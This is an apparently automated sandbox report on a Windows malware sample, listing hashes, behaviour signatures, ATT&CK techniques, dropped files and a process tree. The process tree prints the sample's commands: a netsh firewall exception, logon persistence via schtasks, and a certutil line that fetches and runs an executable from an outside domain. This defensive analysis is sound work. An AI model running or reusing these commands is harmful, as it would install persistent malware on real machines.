Analysis

  • max time kernel
    23s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-11-2020 19:46

General

  • Target

    SecuriteInfo.com.BehavesLike.Win32.Generic.wc.19119.exe

  • Size

    3.9MB

  • MD5

    a0efed30b010ca2d54e5df9a091499ac

  • SHA1

    b5551d53bf87cf21b829d48411885df5fa3d8bbc

  • SHA256

    d5d368c9ba295ef4c36fe1e02452418d14f27512fe153c2f16f7384ca60b3db4

  • SHA512

    fa1573f86d32ec76473c9941b3f14e3c0e90a976225006116c4ad59315e7c1d682c05a98e295fc7c2c85cb4824143f3c0f0e2e61fb2ac4dd4ba8acd6eae2e5fe

Malware Config

Signatures

  • Windows security bypass 2 TTPs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 8 IoCs
  • Windows security modification 2 TTPs 12 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • JavaScript code in executable 3 IoCs
  • Modifies service 2 TTPs 5 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 237 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.BehavesLike.Win32.Generic.wc.19119.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.BehavesLike.Win32.Generic.wc.19119.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1744
    • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.BehavesLike.Win32.Generic.wc.19119.exe
      "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.BehavesLike.Win32.Generic.wc.19119.exe"
      2⤵
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1848
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\a11adf549854\a11adf549854\a11adf549854.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1096
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\a11adf549854\a11adf549854\a11adf549854.exe" enable=yes
          4⤵
          • Modifies service
          • Modifies data under HKEY_USERS
          PID:1440
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious use of AdjustPrivilegeToken
        PID:1960
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1724
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://hotbooks.tech/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1284
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:828

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

2
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Disabling Security Tools

2
T1089

Modify Registry

4
T1112

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    MD5

    a0efed30b010ca2d54e5df9a091499ac

    SHA1

    b5551d53bf87cf21b829d48411885df5fa3d8bbc

    SHA256

    d5d368c9ba295ef4c36fe1e02452418d14f27512fe153c2f16f7384ca60b3db4

    SHA512

    fa1573f86d32ec76473c9941b3f14e3c0e90a976225006116c4ad59315e7c1d682c05a98e295fc7c2c85cb4824143f3c0f0e2e61fb2ac4dd4ba8acd6eae2e5fe

  • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • \Users\Admin\AppData\Local\Temp\dbghelp.dll
    MD5

    f0616fa8bc54ece07e3107057f74e4db

    SHA1

    b33995c4f9a004b7d806c4bb36040ee844781fca

    SHA256

    6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

    SHA512

    15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\symsrv.dll
    MD5

    5c399d34d8dc01741269ff1f1aca7554

    SHA1

    e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

    SHA256

    e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

    SHA512

    8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

  • \Windows\rss\csrss.exe
    MD5

    a0efed30b010ca2d54e5df9a091499ac

    SHA1

    b5551d53bf87cf21b829d48411885df5fa3d8bbc

    SHA256

    d5d368c9ba295ef4c36fe1e02452418d14f27512fe153c2f16f7384ca60b3db4

    SHA512

    fa1573f86d32ec76473c9941b3f14e3c0e90a976225006116c4ad59315e7c1d682c05a98e295fc7c2c85cb4824143f3c0f0e2e61fb2ac4dd4ba8acd6eae2e5fe

  • \Windows\rss\csrss.exe
    MD5

    a0efed30b010ca2d54e5df9a091499ac

    SHA1

    b5551d53bf87cf21b829d48411885df5fa3d8bbc

    SHA256

    d5d368c9ba295ef4c36fe1e02452418d14f27512fe153c2f16f7384ca60b3db4

    SHA512

    fa1573f86d32ec76473c9941b3f14e3c0e90a976225006116c4ad59315e7c1d682c05a98e295fc7c2c85cb4824143f3c0f0e2e61fb2ac4dd4ba8acd6eae2e5fe

  • memory/1096-18-0x0000000000000000-mapping.dmp
  • memory/1440-19-0x0000000000000000-mapping.dmp
  • memory/1612-34-0x000007FEF5BD0000-0x000007FEF5E4A000-memory.dmp
    Filesize

    2.5MB

  • memory/1744-0-0x0000000000D20000-0x00000000010C6000-memory.dmp
    Filesize

    3.6MB

  • memory/1744-2-0x0000000000400000-0x0000000000B10000-memory.dmp
    Filesize

    7.1MB

  • memory/1744-1-0x00000000010D0000-0x00000000010E1000-memory.dmp
    Filesize

    68KB

  • memory/1848-17-0x0000000000400000-0x0000000000B10000-memory.dmp
    Filesize

    7.1MB

  • memory/1848-16-0x0000000001380000-0x0000000001391000-memory.dmp
    Filesize

    68KB

  • memory/1848-15-0x0000000000FD0000-0x0000000001376000-memory.dmp
    Filesize

    3.6MB

  • memory/1960-22-0x0000000000000000-mapping.dmp
  • memory/1960-24-0x0000000000E40000-0x00000000011E6000-memory.dmp
    Filesize

    3.6MB

  • memory/1960-25-0x00000000011F0000-0x0000000001201000-memory.dmp
    Filesize

    68KB